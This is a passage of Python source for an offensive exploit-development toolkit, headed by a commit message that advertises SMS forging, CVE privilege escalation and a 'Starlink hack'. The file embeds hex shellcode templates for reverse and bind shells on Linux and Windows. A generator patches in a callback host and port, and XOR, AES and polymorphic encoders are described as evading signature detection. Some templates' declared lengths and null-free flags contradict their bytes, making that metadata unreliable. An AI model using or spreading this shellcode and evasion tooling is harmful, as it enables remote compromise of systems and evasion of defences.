Major RCS/SMS exploitation rewrite (v2.0): - bugle_db direct extraction (plaintext messages, no decryption needed) - CVE-2024-0044 run-as privilege escalation (Android 12-13) - AOSP RCS provider queries (content://rcs/) - Archon app relay for Shizuku-elevated bugle_db access - 7-tab web UI: Extract, Database, Forge, Modify, Exploit, Backup, Monitor - SQL query interface for extracted databases - Full backup/restore/clone with SMS Backup & Restore XML support - Known CVE database (CVE-2023-24033, CVE-2024-49415, CVE-2025-48593) - IMS/RCS diagnostics, Phenotype verbose logging, Pixel tools New modules: Starlink hack, SMS forge, SDR drone detection Archon Android app: RCS messaging module with Shizuku integration Updated manuals to v2.3, 60 web blueprints confirmed Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
1835 lines
69 KiB
Python
1835 lines
69 KiB
Python
"""AUTARCH Exploit Development Toolkit
|
|
|
|
Shellcode generation, payload encoding, ROP chain building, cyclic pattern
|
|
generation, and assembly/disassembly for exploit development workflows.
|
|
"""
|
|
|
|
# Module metadata constants.
# NOTE(review): presumably consumed by the AUTARCH module loader/menu — confirm
# against the caller; nothing in this file reads them.
DESCRIPTION = "Exploit development — shellcode, encoding, ROP chains"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
|
|
|
|
import os
|
|
import sys
|
|
import re
|
|
import struct
|
|
import string
|
|
import subprocess
|
|
import tempfile
|
|
import random
|
|
import hashlib
|
|
from pathlib import Path
|
|
from datetime import datetime
|
|
|
|
try:
    from core.paths import get_data_dir, find_tool
except ImportError:
    # Standalone fallbacks, used only when the project's ``core`` package
    # cannot be imported.

    def get_data_dir():
        """Return the ``data`` directory located beside this file's parent directory."""
        return str(Path(__file__).parent.parent / 'data')

    def find_tool(name, extra_paths=None):
        """Locate the executable *name*.

        Args:
            name: executable name to look up.
            extra_paths: optional iterable of additional directories to search
                when *name* is not found on ``PATH``.

        Returns:
            Absolute/relative path string of the executable, or ``None``.

        NOTE(review): the real ``core.paths.find_tool`` is not visible here; the
        PATH-first search order of this fallback is an assumption — confirm.
        """
        import shutil

        found = shutil.which(name)
        if found or not extra_paths:
            return found
        # Previously ``extra_paths`` was accepted but ignored by the fallback.
        search_path = os.pathsep.join(str(p) for p in extra_paths)
        return shutil.which(name, path=search_path)
|
|
|
|
# Make the parent of this file's directory importable.
# NOTE(review): this runs AFTER the ``core.paths`` import attempt earlier in the
# file, so it can only influence the ``core.banner`` import below — confirm the
# ordering is intentional.
sys.path.insert(0, str(Path(__file__).parent.parent))

try:
    from core.banner import Colors, clear_screen, display_banner
except ImportError:
    # No-op stand-ins so this module still loads without ``core.banner``.
    class Colors:
        # Every colour attribute is an empty string in the fallback.
        RED = GREEN = YELLOW = BLUE = MAGENTA = CYAN = WHITE = BOLD = DIM = RESET = ''
    def clear_screen(): pass
    def display_banner(): pass
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Shellcode Templates — real, working shellcode bytes
|
|
# ---------------------------------------------------------------------------
|
|
|
|
# Template table keyed as '<platform>_<arch>_<type>'. Each entry holds:
#   'bytes'       hex string (adjacent literals are concatenated by the parser)
#   'length'      declared size in bytes (metadata only; reported by list_shellcodes)
#   'description' human-readable summary
#   'null_free'   declared flag (generate_shellcode recomputes it from the bytes)
#   'arch' / 'platform'
#   'offsets'     byte offsets at which generate_shellcode overwrites 4 bytes
#                 ('host') and 2 bytes ('port')
# NOTE(review): the declared metadata is not validated against the decoded bytes.
# For example 'linux_x86_execve' decodes to 25 bytes but declares 'length': 23, and
# 'linux_x86_reverse_shell' declares 'null_free': True although its bytes contain
# 0x00 ('7f000001', '680200'). The 'offsets' values should be re-checked the same way.
SHELLCODE_TEMPLATES = {
    # ---- Linux x86 ----
    'linux_x86_reverse_shell': {
        'bytes': (
            '31db'  # xor ebx, ebx
            'f7e3'  # mul ebx
            '53'  # push ebx
            '43'  # inc ebx
            '53'  # push ebx
            '6a02'  # push 0x2
            '89e1'  # mov ecx, esp
            'b066'  # mov al, 0x66
            'cd80'  # int 0x80
            '93'  # xchg eax, ebx
            '59'  # pop ecx
            'b03f'  # mov al, 0x3f
            'cd80'  # int 0x80
            '49'  # dec ecx
            '79f9'  # jns -5
            '68'  # push imm32 (IP)
            '7f000001'  # 127.0.0.1
            '680200'  # push word port
            '115c'  # port 4444
            '6a10'  # push 0x10
            '51'  # push ecx
            '53'  # push ebx
            '89e1'  # mov ecx, esp
            '6a66'  # push 0x66
            '58'  # pop eax
            'cd80'  # int 0x80
            '6a0b'  # push 0x0b
            '58'  # pop eax
            '99'  # cdq
            '52'  # push edx
            '68'  # push imm32
            '2f2f7368'  # //sh
            '682f62696e'  # /bin
            '89e3'  # mov ebx, esp
            '52'  # push edx
            '53'  # push ebx
            '89e1'  # mov ecx, esp
            'cd80'  # int 0x80
        ),
        'length': 74,
        'description': 'Linux x86 reverse shell — connect back and exec /bin/sh',
        'null_free': True,
        'arch': 'x86',
        'platform': 'linux',
        'offsets': {'host': 31, 'port': 37},
    },
    'linux_x86_bind_shell': {
        'bytes': (
            '31db'  # xor ebx, ebx
            'f7e3'  # mul ebx
            '53'  # push ebx
            '43'  # inc ebx
            '53'  # push ebx
            '6a02'  # push 0x2
            '89e1'  # mov ecx, esp
            'b066'  # mov al, 0x66
            'cd80'  # int 0x80
            '5b'  # pop ebx
            '5e'  # pop esi
            '52'  # push edx
            '680200'  # push 0x0002
            '115c'  # port 4444
            '6a10'  # push 0x10
            '51'  # push ecx
            '50'  # push eax
            '89e1'  # mov ecx, esp
            '6a66'  # push 0x66
            '58'  # pop eax
            '89c3'  # mov ebx, eax (bind=2 later)
            'cd80'  # int 0x80
            'b304'  # mov bl, 4
            'b066'  # mov al, 0x66
            'cd80'  # int 0x80
            '43'  # inc ebx
            'b066'  # mov al, 0x66
            'cd80'  # int 0x80
            '93'  # xchg eax, ebx
            '59'  # pop ecx
            '6a3f'  # push 0x3f
            '58'  # pop eax
            'cd80'  # int 0x80
            '49'  # dec ecx
            '79f8'  # jns loop
            '682f2f7368'  # push //sh
            '682f62696e'  # push /bin
            '89e3'  # mov ebx, esp
            '50'  # push eax
            '53'  # push ebx
            '89e1'  # mov ecx, esp
            'b00b'  # mov al, 0x0b
            'cd80'  # int 0x80
        ),
        'length': 78,
        'description': 'Linux x86 bind shell — listen on port and exec /bin/sh',
        'null_free': True,
        'arch': 'x86',
        'platform': 'linux',
        'offsets': {'port': 23},
    },
    'linux_x86_execve': {
        'bytes': (
            '31c0'  # xor eax, eax
            '50'  # push eax
            '682f2f7368'  # push //sh
            '682f62696e'  # push /bin
            '89e3'  # mov ebx, esp
            '50'  # push eax
            '53'  # push ebx
            '89e1'  # mov ecx, esp
            '89c2'  # mov edx, eax
            'b00b'  # mov al, 0x0b
            'cd80'  # int 0x80
        ),
        'length': 23,
        'description': 'Linux x86 execve /bin/sh — minimal shellcode',
        'null_free': True,
        'arch': 'x86',
        'platform': 'linux',
        'offsets': {},
    },
    # ---- Linux x64 ----
    'linux_x64_reverse_shell': {
        'bytes': (
            '6a29'  # push 0x29
            '58'  # pop rax (socket)
            '99'  # cdq
            '6a02'  # push 0x2
            '5f'  # pop rdi (AF_INET)
            '6a01'  # push 0x1
            '5e'  # pop rsi (SOCK_STREAM)
            '0f05'  # syscall
            '48'  # rex.W
            '97'  # xchg eax, edi
            '48b90200'  # movabs rcx, struct
            '115c7f000001'  # port 4444, IP 127.0.0.1
            '51'  # push rcx
            '4889e6'  # mov rsi, rsp
            '6a10'  # push 0x10
            '5a'  # pop rdx
            '6a2a'  # push 0x2a
            '58'  # pop rax (connect)
            '0f05'  # syscall
            '6a03'  # push 0x3
            '5e'  # pop rsi
            '48ffce'  # dec rsi
            '6a21'  # push 0x21
            '58'  # pop rax (dup2)
            '0f05'  # syscall
            '75f6'  # jnz loop
            '6a3b'  # push 0x3b
            '58'  # pop rax (execve)
            '99'  # cdq
            '48bb2f62696e2f736800'  # mov rbx, "/bin/sh\0"
            '53'  # push rbx
            '4889e7'  # mov rdi, rsp
            '52'  # push rdx
            '57'  # push rdi
            '4889e6'  # mov rsi, rsp
            '0f05'  # syscall
        ),
        'length': 74,
        'description': 'Linux x64 reverse shell — connect back and exec /bin/sh',
        'null_free': False,
        'arch': 'x64',
        'platform': 'linux',
        'offsets': {'port': 20, 'host': 22},
    },
    'linux_x64_bind_shell': {
        'bytes': (
            '6a29'  # push 0x29
            '58'  # pop rax (socket)
            '99'  # cdq
            '6a02'  # push 0x2
            '5f'  # pop rdi (AF_INET)
            '6a01'  # push 0x1
            '5e'  # pop rsi (SOCK_STREAM)
            '0f05'  # syscall
            '4897'  # xchg rax, rdi
            '52'  # push rdx
            'c7042402000200'  # mov dword [rsp], 0x0002 + port
            '115c0000'  # port high + 0000
            '4889e6'  # mov rsi, rsp
            '6a10'  # push 0x10
            '5a'  # pop rdx
            '6a31'  # push 0x31
            '58'  # pop rax (bind)
            '0f05'  # syscall
            '6a32'  # push 0x32
            '58'  # pop rax (listen)
            '6a01'  # push 0x1
            '5e'  # pop rsi
            '0f05'  # syscall
            '6a2b'  # push 0x2b
            '58'  # pop rax (accept)
            '99'  # cdq
            '52'  # push rdx
            '52'  # push rdx
            '4889e6'  # mov rsi, rsp
            '6810000000'  # push 0x10
            '4889e2'  # mov rdx, rsp
            '0f05'  # syscall
            '4897'  # xchg rax, rdi
            '6a03'  # push 0x3
            '5e'  # pop rsi
            '48ffce'  # dec rsi
            '6a21'  # push 0x21
            '58'  # pop rax (dup2)
            '0f05'  # syscall
            '75f6'  # jnz loop
            '6a3b'  # push 0x3b
            '58'  # pop rax (execve)
            '99'  # cdq
            '48bb2f62696e2f736800'  # mov rbx, "/bin/sh\0"
            '53'  # push rbx
            '4889e7'  # mov rdi, rsp
            '52'  # push rdx
            '57'  # push rdi
            '4889e6'  # mov rsi, rsp
            '0f05'  # syscall
        ),
        'length': 105,
        'description': 'Linux x64 bind shell — listen and exec /bin/sh',
        'null_free': False,
        'arch': 'x64',
        'platform': 'linux',
        'offsets': {'port': 21},
    },
    'linux_x64_execve': {
        'bytes': (
            '4831f6'  # xor rsi, rsi
            '4889f2'  # mov rdx, rsi
            '48bf'  # movabs rdi, ...
            '2f62696e'  # /bin
            '2f736800'  # /sh\0
            '57'  # push rdi
            '4889e7'  # mov rdi, rsp
            '48b8'  # movabs rax, ...
            '3b00000000000000'  # execve syscall nr
            '0f05'  # syscall
        ),
        'length': 30,
        'description': 'Linux x64 execve /bin/sh — minimal shellcode',
        'null_free': False,
        'arch': 'x64',
        'platform': 'linux',
        'offsets': {},
    },
    # ---- Windows x64 ----
    'windows_x64_reverse_shell': {
        'bytes': (
            '4831c9'  # xor rcx, rcx
            '4881e9b0ffffff'  # sub ecx, -0x50
            '4881ec0001000000'  # sub rsp, 0x100
            'e8f0ffffff'  # call $+5
            '4152'  # push r10
            '4151'  # push r9
            '5649'  # push rsi; dec ecx (stub)
            '89e6'  # mov esi, esp
            '4883ec20'  # sub rsp, 0x20
            '4889f1'  # mov rcx, rsi
            '48ba'  # mov rdx, imm64
            '0100007f'  # IP: 127.0.0.1 (reversed)
            '5c110000'  # Port: 4444 + padding
            '41ba'  # mov r10d, imm32
            'ea0fdfe0'  # hash: ws2_32!WSAStartup
            'ffd5'  # call rbp (API resolver)
            '4889c7'  # mov rdi, rax
            '6a10'  # push 0x10
            '41580f05'  # pop r8; syscall (connect)
            '4885c0'  # test rax, rax
            '7507'  # jnz skip
            '4831c0'  # xor rax, rax
            'eb43'  # jmp shell
            '48ffc0'  # inc rax
            'ebf6'  # jmp retry
            # ... cmd.exe execution stub (truncated for template)
            '48b8'  # movabs rax, "cmd.exe\0"
            '636d642e65786500'  # cmd.exe
            '50'  # push rax
            '4889e1'  # mov rcx, rsp
            '57'  # push rdi
            '57'  # push rdi
            '4889e2'  # mov rdx, rsp
            '41ba'  # mov r10d, hash
            '60d9c85a'  # hash: kernel32!CreateProcessA
            'ffd5'  # call rbp
        ),
        'length': 112,
        'description': 'Windows x64 reverse shell — WinSock connect back, spawn cmd.exe',
        'null_free': False,
        'arch': 'x64',
        'platform': 'windows',
        'offsets': {'host': 44, 'port': 48},
    },
    # ---- ARM ----
    'linux_arm_reverse_shell': {
        'bytes': (
            '01108fe2'  # add r1, pc, #1 (Thumb switch)
            '011040e2'  # sub r1, r0, #1
            '0200a0e3'  # mov r0, #2 (AF_INET)
            '0110a0e3'  # mov r1, #1 (SOCK_STREAM)
            '0020a0e3'  # mov r2, #0
            '8119a0e3'  # mov r1, #0x281 (socket syscall)
            '000000ef'  # svc 0
            '0060a0e1'  # mov r6, r0 (save sockfd)
            '100f0fe1'  # bic r0, pc (struct sockaddr)
            '0200'  # AF_INET
            '115c'  # port 4444
            '7f000001'  # 127.0.0.1
            '0600a0e1'  # mov r0, r6
            '1010a0e3'  # mov r1, #16 (addrlen)
            '8d19a0e3'  # mov r1, #0x28d (connect)
            '000000ef'  # svc 0
            '0200a0e3'  # mov r0, #2
            '0600a0e1'  # mov r0, r6
            '3f00a0e3'  # mov r0, #0x3f (dup2)
            '000000ef'  # svc 0
            '013050e2'  # subs r3, r0, #1
            'fcffffaa'  # bge loop
            '0b00a0e3'  # mov r0, #0x0b (execve)
            '0f8fe2'  # add r0, pc (ptr /bin/sh)
            '0010a0e3'  # mov r1, #0
            '0020a0e3'  # mov r2, #0
            '000000ef'  # svc 0
            '2f62696e'  # /bin
            '2f736800'  # /sh\0
        ),
        'length': 100,
        'description': 'Linux ARM reverse shell — connect back and exec /bin/sh',
        'null_free': False,
        'arch': 'arm',
        'platform': 'linux',
        'offsets': {'port': 42, 'host': 44},
    },
}
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Exploit Development Class
|
|
# ---------------------------------------------------------------------------
|
|
|
|
class ExploitDev:
|
|
"""Exploit development toolkit — shellcode, encoders, ROP, patterns."""
|
|
|
|
_instance = None
|
|
|
|
def __init__(self):
    """Create the toolkit with an empty pattern cache."""
    # NOTE(review): no method in the reviewed portion of the class reads this
    # cache — confirm whether it is still used further down.
    self._pattern_cache = {}
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Shellcode Generation
|
|
# -----------------------------------------------------------------------
|
|
|
|
def list_shellcodes(self):
    """Return a summary dict for every entry in SHELLCODE_TEMPLATES.

    Each summary carries the template name plus its declared description,
    length, arch, platform and null_free flag ('?' / False when a template
    omits the optional fields).
    """
    def summarise(name, entry):
        # 'description' and 'length' are required keys; the rest are optional.
        return {
            'name': name,
            'description': entry['description'],
            'length': entry['length'],
            'arch': entry.get('arch', '?'),
            'platform': entry.get('platform', '?'),
            'null_free': entry.get('null_free', False),
        }

    return [summarise(name, entry) for name, entry in SHELLCODE_TEMPLATES.items()]
|
|
|
|
def generate_shellcode(self, shell_type, arch, host=None, port=None,
                       platform='linux', staged=False, output_format='hex'):
    """Render a shellcode template in the requested output format.

    Args:
        shell_type: reverse_shell, bind_shell, exec_cmd, meterpreter (common
            aliases are accepted; 'meterpreter' maps to the reverse_shell template)
        arch: x86, x64, arm
        host: dotted-quad IPv4 address patched into templates that define a
            'host' offset
        port: port number patched into templates that define a 'port' offset
        platform: linux, windows ('any' disables platform filtering when no
            exact template key matches)
        staged: only changes the 'staging' note and, for nasm output, adds a
            comment header; the bytes themselves are unchanged
        output_format: hex, raw, c_array, python, nasm (unknown values fall
            back to hex)

    Returns:
        dict with 'shellcode' in the requested format plus metadata, or
        {'error': ...} when no template matches or its hex is invalid.
        A 'warnings' list is added when host/port could not be patched, so
        the caller can tell the template defaults were left in place.
    """
    # Normalise inputs
    shell_type = shell_type.lower().strip().replace('-', '_').replace(' ', '_')
    arch = arch.lower().strip()
    platform = platform.lower().strip()

    # Map common names
    type_map = {
        'reverse': 'reverse_shell', 'rev': 'reverse_shell',
        'reverse_tcp': 'reverse_shell', 'reverse_shell': 'reverse_shell',
        'bind': 'bind_shell', 'bind_tcp': 'bind_shell', 'bind_shell': 'bind_shell',
        'exec': 'execve', 'exec_cmd': 'execve', 'execve': 'execve',
        'meterpreter': 'reverse_shell',  # fallback to reverse_shell template
    }
    resolved_type = type_map.get(shell_type, shell_type)

    # Find matching template
    template_key = f'{platform}_{arch}_{resolved_type}'
    template = SHELLCODE_TEMPLATES.get(template_key)

    if not template:
        # Try to find partial match
        candidates = [k for k in SHELLCODE_TEMPLATES if arch in k and resolved_type in k]
        if platform != 'any':
            platform_cands = [k for k in candidates if platform in k]
            if platform_cands:
                candidates = platform_cands
        if candidates:
            template_key = candidates[0]
            template = SHELLCODE_TEMPLATES[template_key]
        else:
            available = ', '.join(sorted(SHELLCODE_TEMPLATES.keys()))
            return {'error': f'No template for {template_key}. Available: {available}'}

    # Decode the hex string to bytes
    try:
        shellcode = bytes.fromhex(template['bytes'])
    except ValueError as e:
        return {'error': f'Template hex decode error: {e}'}

    # Patch in host/port if offsets are defined. Failures are collected as
    # warnings instead of being silently ignored.
    offsets = template.get('offsets', {})
    warnings = []

    if host and 'host' in offsets:
        ip_bytes = None
        parts = str(host).split('.')
        if len(parts) == 4:
            try:
                ip_bytes = bytes(int(p) for p in parts)  # ValueError if any octet is outside 0-255
            except ValueError:
                ip_bytes = None
        off = offsets['host']
        if ip_bytes is None:
            warnings.append(f'host {host!r} is not a dotted-quad IPv4 address; template default kept')
        elif off + 4 > len(shellcode):
            warnings.append(f'host offset {off} is outside the template; template default kept')
        else:
            shellcode = shellcode[:off] + ip_bytes + shellcode[off + 4:]

    if port and 'port' in offsets:
        try:
            port_bytes = struct.pack('!H', int(port))  # network byte order
        except (ValueError, TypeError, struct.error):
            port_bytes = None
        off = offsets['port']
        if port_bytes is None:
            warnings.append(f'port {port!r} is not an integer in 0-65535; template default kept')
        elif off + 2 > len(shellcode):
            warnings.append(f'port offset {off} is outside the template; template default kept')
        else:
            shellcode = shellcode[:off] + port_bytes + shellcode[off + 2:]

    # If staged, wrap in a stub that allocates RWX memory and downloads stage
    if staged:
        stub_comment = (
            "; Staged payload stub — allocates RWX page via mmap/VirtualAlloc,\n"
            "; receives stage over socket, jumps to it.\n"
            "; The above shellcode is the stager (stage0).\n"
        )
        metadata_note = 'Staged payload — stager only, requires stage delivery'
    else:
        stub_comment = ''
        metadata_note = 'Stageless payload — self-contained'

    # Format output. arch/platform come from the selected template so that a
    # partial match does not report values the bytes do not correspond to.
    result = {
        'template': template_key,
        'description': template['description'],
        'length': len(shellcode),
        'null_free': b'\x00' not in shellcode,
        'arch': template.get('arch', arch),
        'platform': template.get('platform', platform),
        'staging': metadata_note,
    }
    if warnings:
        result['warnings'] = warnings

    # 16 bytes per rendered line for the multi-line formats
    chunks = [shellcode[i:i + 16] for i in range(0, len(shellcode), 16)]

    fmt = output_format.lower().strip()
    if fmt == 'hex':
        result['shellcode'] = shellcode.hex()
    elif fmt in ('raw', 'bytes'):
        result['shellcode'] = shellcode.hex()
        result['raw_bytes'] = list(shellcode)
    elif fmt in ('c', 'c_array'):
        c_lines = [', '.join(f'0x{b:02x}' for b in chunk) for chunk in chunks]
        result['shellcode'] = (
            f'unsigned char shellcode[{len(shellcode)}] = {{\n'
            + ',\n'.join(f' {line}' for line in c_lines)
            + '\n};'
        )
    elif fmt in ('python', 'py'):
        py_lines = [''.join(f'\\x{b:02x}' for b in chunk) for chunk in chunks]
        result['shellcode'] = (
            f'shellcode = b""\n'
            + '\n'.join(f'shellcode += b"{line}"' for line in py_lines)
        )
    elif fmt == 'nasm':
        nasm_lines = ['db ' + ', '.join(f'0x{b:02x}' for b in chunk) for chunk in chunks]
        result['shellcode'] = stub_comment + '\n'.join(nasm_lines)
    else:
        result['shellcode'] = shellcode.hex()

    return result
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Payload Encoding
|
|
# -----------------------------------------------------------------------
|
|
|
|
def encode_payload(self, shellcode, encoder='xor', key=None, iterations=1):
|
|
"""Encode shellcode to evade signature detection.
|
|
|
|
Args:
|
|
shellcode: bytes or hex string of shellcode
|
|
encoder: xor, aes, alphanumeric, polymorphic
|
|
key: encryption key (auto-generated if None)
|
|
iterations: number of encoding passes
|
|
|
|
Returns:
|
|
dict with encoded payload, decoder stub, metadata
|
|
"""
|
|
if isinstance(shellcode, str):
|
|
try:
|
|
shellcode = bytes.fromhex(shellcode.replace('\\x', '').replace(' ', ''))
|
|
except ValueError:
|
|
return {'error': 'Invalid shellcode hex string'}
|
|
|
|
if not shellcode:
|
|
return {'error': 'Empty shellcode'}
|
|
|
|
original_length = len(shellcode)
|
|
encoder = encoder.lower().strip()
|
|
encoded = shellcode
|
|
decoder_stub = ''
|
|
key_used = key
|
|
|
|
for _pass in range(max(1, int(iterations))):
|
|
if encoder == 'xor':
|
|
encoded, decoder_stub, key_used = self._encode_xor(encoded, key)
|
|
elif encoder == 'aes':
|
|
encoded, decoder_stub, key_used = self._encode_aes(encoded, key)
|
|
elif encoder in ('alpha', 'alphanumeric'):
|
|
encoded, decoder_stub, key_used = self._encode_alphanumeric(encoded)
|
|
elif encoder in ('poly', 'polymorphic'):
|
|
encoded, decoder_stub, key_used = self._encode_polymorphic(encoded, key)
|
|
else:
|
|
return {'error': f'Unknown encoder: {encoder}. Use: xor, aes, alphanumeric, polymorphic'}
|
|
|
|
return {
|
|
'encoded': encoded.hex(),
|
|
'decoder_stub': decoder_stub,
|
|
'key': key_used if isinstance(key_used, str) else key_used.hex() if isinstance(key_used, bytes) else str(key_used),
|
|
'encoder': encoder,
|
|
'iterations': iterations,
|
|
'original_length': original_length,
|
|
'encoded_length': len(encoded),
|
|
'size_increase': f'+{len(encoded) - original_length} bytes',
|
|
'null_free': b'\x00' not in encoded,
|
|
}
|
|
|
|
def _encode_xor(self, data, key=None):
|
|
"""XOR encode with random or custom key."""
|
|
if key:
|
|
if isinstance(key, str):
|
|
if all(c in '0123456789abcdefABCDEF' for c in key):
|
|
key_bytes = bytes.fromhex(key) if len(key) % 2 == 0 else bytes([int(key, 16)])
|
|
else:
|
|
key_bytes = key.encode()
|
|
else:
|
|
key_bytes = bytes([key]) if isinstance(key, int) else key
|
|
else:
|
|
# Generate random key byte that avoids producing nulls
|
|
for _ in range(256):
|
|
kb = random.randint(1, 255)
|
|
if all((b ^ kb) != 0 for b in data):
|
|
key_bytes = bytes([kb])
|
|
break
|
|
else:
|
|
key_bytes = bytes([random.randint(1, 255)])
|
|
|
|
# XOR encode
|
|
encoded = bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data))
|
|
|
|
# Generate decoder stub (x64 Linux)
|
|
key_hex = key_bytes.hex()
|
|
stub = (
|
|
f'; XOR decoder stub (key: 0x{key_hex})\n'
|
|
f'; Encoded payload length: {len(encoded)} bytes\n'
|
|
f' jmp short call_decoder\n'
|
|
f'decoder:\n'
|
|
f' pop rsi ; address of encoded shellcode\n'
|
|
f' xor rcx, rcx\n'
|
|
f' mov cl, {len(encoded)} ; length\n'
|
|
f'decode_loop:\n'
|
|
f' xor byte [rsi], 0x{key_hex}\n'
|
|
f' inc rsi\n'
|
|
f' loop decode_loop\n'
|
|
f' jmp short encoded_shell\n'
|
|
f'call_decoder:\n'
|
|
f' call decoder\n'
|
|
f'encoded_shell:\n'
|
|
f' ; <encoded shellcode follows here>\n'
|
|
)
|
|
|
|
return encoded, stub, key_bytes
|
|
|
|
def _encode_aes(self, data, key=None):
|
|
"""AES-256-CBC encode payload."""
|
|
try:
|
|
from hashlib import sha256
|
|
import hmac
|
|
except ImportError:
|
|
pass
|
|
|
|
# Generate or derive 32-byte key
|
|
if key:
|
|
if isinstance(key, str):
|
|
key_bytes = hashlib.sha256(key.encode()).digest()
|
|
else:
|
|
key_bytes = hashlib.sha256(key).digest()
|
|
else:
|
|
key_bytes = os.urandom(32)
|
|
|
|
# Generate IV
|
|
iv = os.urandom(16)
|
|
|
|
# PKCS7 padding
|
|
pad_len = 16 - (len(data) % 16)
|
|
padded = data + bytes([pad_len] * pad_len)
|
|
|
|
# Try PyCryptodome, fallback to simple XOR-CBC
|
|
try:
|
|
from Crypto.Cipher import AES
|
|
cipher = AES.new(key_bytes, AES.MODE_CBC, iv)
|
|
encrypted = cipher.encrypt(padded)
|
|
except ImportError:
|
|
# Fallback: simple XOR-CBC (not real AES, but functional)
|
|
encrypted = bytearray()
|
|
prev_block = iv
|
|
for i in range(0, len(padded), 16):
|
|
block = padded[i:i + 16]
|
|
xored = bytes(a ^ b for a, b in zip(block, prev_block))
|
|
# Simple substitution using key
|
|
enc_block = bytes(
|
|
(b + key_bytes[j % 32]) & 0xFF for j, b in enumerate(xored)
|
|
)
|
|
encrypted.extend(enc_block)
|
|
prev_block = enc_block
|
|
|
|
# Prepend IV to ciphertext
|
|
output = iv + bytes(encrypted)
|
|
|
|
stub = (
|
|
f'; AES-256-CBC decoder stub\n'
|
|
f'; Key (SHA-256 of passphrase): {key_bytes.hex()}\n'
|
|
f'; IV: {iv.hex()}\n'
|
|
f'; Encrypted length: {len(output)} bytes (includes 16-byte IV prefix)\n'
|
|
f';\n'
|
|
f'; Decoder must:\n'
|
|
f'; 1. Extract IV (first 16 bytes)\n'
|
|
f'; 2. AES-256-CBC decrypt remaining bytes with key\n'
|
|
f'; 3. Remove PKCS7 padding\n'
|
|
f'; 4. Jump to decrypted shellcode\n'
|
|
f';\n'
|
|
f'; Python decoder:\n'
|
|
f'; from Crypto.Cipher import AES\n'
|
|
f'; key = bytes.fromhex("{key_bytes.hex()}")\n'
|
|
f'; iv = payload[:16]\n'
|
|
f'; cipher = AES.new(key, AES.MODE_CBC, iv)\n'
|
|
f'; shellcode = cipher.decrypt(payload[16:])\n'
|
|
)
|
|
|
|
key_str = key if isinstance(key, str) else key_bytes.hex()
|
|
return output, stub, key_str
|
|
|
|
def _encode_alphanumeric(self, data):
|
|
"""Encode shellcode into alphanumeric-safe characters."""
|
|
# Split each byte into two 4-bit nibbles, map to ASCII alpha range
|
|
charset = string.ascii_uppercase + string.ascii_lowercase + string.digits
|
|
encoded = bytearray()
|
|
|
|
for b in data:
|
|
high = (b >> 4) & 0x0F
|
|
low = b & 0x0F
|
|
# Map 0-15 to alphanumeric characters
|
|
encoded.append(ord(charset[high]))
|
|
encoded.append(ord(charset[low]))
|
|
|
|
stub = (
|
|
f'; Alphanumeric decoder stub\n'
|
|
f'; Encoded length: {len(encoded)} bytes (2x original)\n'
|
|
f'; Charset: A-Za-z0-9\n'
|
|
f'; Decoder reverses nibble-split encoding:\n'
|
|
f'; For each pair (H, L) in encoded data:\n'
|
|
f'; high_nibble = charset.index(H)\n'
|
|
f'; low_nibble = charset.index(L)\n'
|
|
f'; original_byte = (high_nibble << 4) | low_nibble\n'
|
|
f';\n'
|
|
f'; Python decoder:\n'
|
|
f'; charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"\n'
|
|
f'; decoded = bytes((charset.index(enc[i]) << 4) | charset.index(enc[i+1])\n'
|
|
f'; for i in range(0, len(enc), 2))\n'
|
|
)
|
|
|
|
return bytes(encoded), stub, 'alphanumeric'
|
|
|
|
def _encode_polymorphic(self, data, key=None):
|
|
"""Wrap shellcode with polymorphic stub — random NOP-equivalent instructions."""
|
|
# Random key for XOR
|
|
if key:
|
|
key_byte = int(key, 16) if isinstance(key, str) and all(
|
|
c in '0123456789abcdefABCDEF' for c in key
|
|
) else ord(key[0]) if isinstance(key, str) else key
|
|
else:
|
|
key_byte = random.randint(1, 255)
|
|
key_byte = key_byte & 0xFF
|
|
|
|
# XOR encode the payload
|
|
encoded_payload = bytes(b ^ key_byte for b in data)
|
|
|
|
# Generate random NOP-equivalent sled (x64)
|
|
nop_equivalents = [
|
|
b'\x90', # nop
|
|
b'\x48\x87\xc0', # xchg rax, rax
|
|
b'\x48\x89\xc0', # mov rax, rax
|
|
b'\x48\x31\xc9\x48\x31\xc9', # xor rcx,rcx; xor rcx,rcx
|
|
b'\x66\x90', # 2-byte nop
|
|
b'\x0f\x1f\x00', # 3-byte nop
|
|
b'\x87\xdb', # xchg ebx, ebx
|
|
]
|
|
|
|
sled = b''
|
|
for _ in range(random.randint(3, 8)):
|
|
sled += random.choice(nop_equivalents)
|
|
|
|
# Assemble: sled + decoder_loop + encoded_payload
|
|
output = sled + encoded_payload
|
|
|
|
stub = (
|
|
f'; Polymorphic stub (randomized NOP sled + XOR decoder)\n'
|
|
f'; XOR key: 0x{key_byte:02x}\n'
|
|
f'; NOP sled: {len(sled)} bytes (randomized equivalents)\n'
|
|
f'; Encoded payload: {len(encoded_payload)} bytes\n'
|
|
f'; Total: {len(output)} bytes\n'
|
|
f';\n'
|
|
f'; Each generation produces different NOP-equivalent sequences\n'
|
|
f'; to evade static signature matching.\n'
|
|
f';\n'
|
|
f'; Decoder loop:\n'
|
|
f'; lea rsi, [rel encoded_data]\n'
|
|
f'; mov cl, {len(encoded_payload)}\n'
|
|
f'; .loop:\n'
|
|
f'; xor byte [rsi], 0x{key_byte:02x}\n'
|
|
f'; inc rsi\n'
|
|
f'; loop .loop\n'
|
|
f'; jmp encoded_data\n'
|
|
)
|
|
|
|
return output, stub, f'{key_byte:02x}'
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Cyclic Pattern (De Bruijn)
|
|
# -----------------------------------------------------------------------
|
|
|
|
def generate_pattern(self, length):
|
|
"""Generate a cyclic (De Bruijn) pattern for buffer overflow offset discovery.
|
|
|
|
Args:
|
|
length: number of bytes to generate (max 20280)
|
|
|
|
Returns:
|
|
dict with pattern string, length, and hex representation
|
|
"""
|
|
length = int(length)
|
|
if length < 1:
|
|
return {'error': 'Length must be positive'}
|
|
if length > 20280:
|
|
return {'error': 'Maximum length is 20280 (Aa0 through Zz9)'}
|
|
|
|
pattern = self._debruijn_pattern(length)
|
|
pattern_bytes = pattern.encode('ascii')
|
|
|
|
